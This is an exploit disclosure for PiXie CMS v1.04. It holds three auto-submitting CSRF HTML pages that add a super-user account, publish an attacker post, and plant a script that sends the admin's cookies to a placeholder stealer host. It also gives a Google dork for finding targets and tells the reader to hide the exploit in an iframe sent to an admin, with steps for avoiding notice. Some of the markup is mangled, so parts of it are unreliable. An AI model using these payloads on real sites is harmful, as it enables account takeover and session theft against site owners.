Add Super User:<html><!--# Exploit Title: PiXie CMS v1.04 <= CSRF Add Super User# Google Dork: allintext: "Pixie Powered"# Date: 28/12/2010# Author: Ali Raheem (AKA wolfmankurd)# Software Link: http://pixie-cms.googlecode.com/files/pixie_v1.04.zip# Version: <=1.04# Tested on: Linux sheevaplug-debian 2.6.32-00007-g56678ec #1 PREEMPT Mon Feb 8 03:49:55 PST 2010 armv5tel GNU/Linux
Note : Repace site and path,
USERNAME no spaces,
REALNAME with a name,
EMAIL with a valid email you get login details
--><head></head><body onload='document.pwn.submit()'><form accept-charset="UTF-8" action="http://SITEANDPATH/admin/?s=settings&x=users" method="post"class="form" name="pwn"><inputtype="hidden" name="uname"id="uname" value="USERNAME"/><!-- No Spaces!--><inputtype="hidden" name="realname"id="realname" value="REALNAME"/><inputtype="hidden" name="email"id="email" value="EMAIL"/><!-- needs to be Valid--><inputtype="hidden" name="user_new" value="Save"/><inputtype="hidden" name="privilege" value="2"/></form></body></html>
Add Post:<html><!--# Exploit Title: PiXie CMS v1.04 <= CSRF Add Post# Google Dork: allintext: "Pixie Powered"# Date: 28/12/2010# Author: Ali Raheem (AKA wolfmankurd)# Software Link: http://pixie-cms.googlecode.com/files/pixie_v1.04.zip# Version: <=1.04# Tested on: Linux sheevaplug-debian 2.6.32-00007-g56678ec #1 PREEMPT Mon Feb 8 03:49:55 PST 2010 armv5tel GNU/Linux# Note: Replace SITE_AND_PATH
Have a look at the form andset title, content, tags and Author to whatever you want.--><head></head><body onload='document.pwn.submit()'><form accept-charset="UTF-8" action="http://SITE_AND_PATH/admin/?s=publish&m=dynamic&x=blog&page=1" method="post" name="pwn"id="form_addedit"class="form"><inputtype="hidden"name="table_name" value="pixie_dynamic_posts"/><inputtype="hidden"class="form_text" name="post_id" value="" maxlength="11"/><inputtype="hidden"class="form_text" name="page_id" value="3" maxlength="11"/><inputtype="hidden"id="date" name="day" value="28"><inputtype="hidden" name="month" value="12"><inputtype="hidden" name="year" value="2010"><inputtype="hidden"class="form_text" name="time" value="16:06" size="5" maxlength="5"/><inputtype="hidden"class="form_text" name="title"id="title" value="PwnT"/><inputtype="hidden" name="content"id="content" cols="50" value="PwnT by CSRF"><inputtype="hidden"class="form_text" name="tags"id="tags" value="Hack"/><inputtype="hidden" name="public"id="public" value="yes"/><inputtype="hidden"type="radio" name="comments"id="comments" value="yes"/><inputtype="hidden"class="form_text" name="author" value="AUTHOR" maxlength="64"/><inputtype="hidden"class="form_text" name="last_modified" value="20101228160628"/><inputtype="hidden"class="form_text" name="post_views" value="" maxlength="99"/><inputtype="hidden"class="form_text" name="post_slug" value="" maxlength="255"/><inputtype="hidden" name="submit_new"class="submit" value="Save"type="submit"/></form></body></html># Exploit Title: PiXie CMS v1.04 CSRF to hidden cookie steal
Needs to be modified for clean URLS.
Place this on your server and replace SITE_AND_PATH with the location of the Pixie CMS.
Then point COOKIE_STEALER_SITE at a cookie stealer I've called it log.php and it GETs then logs the data variable.(https://github.com/Spyware/The-Toolkit/blob/master/recon/multi/cookie-stealer/log.php works) along with a writable log file called log.
Now include this in a secret (make it small and hidden) iframe in a link and send it to an Admin.
How this works, the little iframe first causes the admin to secretly post a new blog article (dated in the year 2000 so it wont be on the front page, maybe even make it non-public). Then redirects him to it. This article steals his cookie. We can do this because of predictable permalinks.
All this happens in seconds in a possibly hidden iframe. The only evidence? It will be in his latest actions log and the blog post (which will hopefully be hidden deep in the archives).--><body
onload='document.pwn.submit();location="http://SITE_AND_PATH/?s=blog&m=permalink&x=__stealer"'><form accept-charset="UTF-8"
action="http://SITE_AND_PATH/admin/?s=publish&m=dynamic&x=blog&page=1"
method="post" name="pwn"id="form_addedit"class="form"><inputtype="hidden"name="table_name" value="pixie_dynamic_posts"/><inputtype="hidden"class="form_text" name="post_id" value=""
maxlength="11"/><inputtype="hidden"class="form_text" name="page_id" value="3"
maxlength="11"/><inputtype="hidden"id="date" name="day" value="10"><inputtype="hidden" name="month" value="12"><inputtype="hidden" name="year" value="2000"><inputtype="hidden"class="form_text" name="time" value="16:06"
size="5" maxlength="5"/><inputtype="hidden"class="form_text" name="title"id="title"
value="__stealer"/><inputtype="hidden" name="content"id="content" cols="50"
value="<img src='https://www.exploit-db.com/exploits/15850/' name='stealer'><script>
document.stealer.src='https://www.exploit-db.com/exploits/15850/COOKIE_STEALER_SITE/log.php?data='+document.cookie;</script>
"><inputtype="hidden"class="form_text" name="tags"id="tags"
value="Hack"/><inputtype="hidden" name="public"id="public" value="yes"/><inputtype="hidden"type="radio" name="comments"id="comments"
value="yes"/><inputtype="hidden"class="form_text" name="author" value="AUTHOR"
maxlength="64"/><inputtype="hidden"class="form_text" name="last_modified"
value="20101228160628"/><inputtype="hidden"class="form_text" name="post_views" value=""
maxlength="99"/><inputtype="hidden"class="form_text" name="post_slug" value=""
maxlength="255"/><inputtype="hidden" name="submit_new"class="submit" value="Save"type="submit"/></form></body></html>
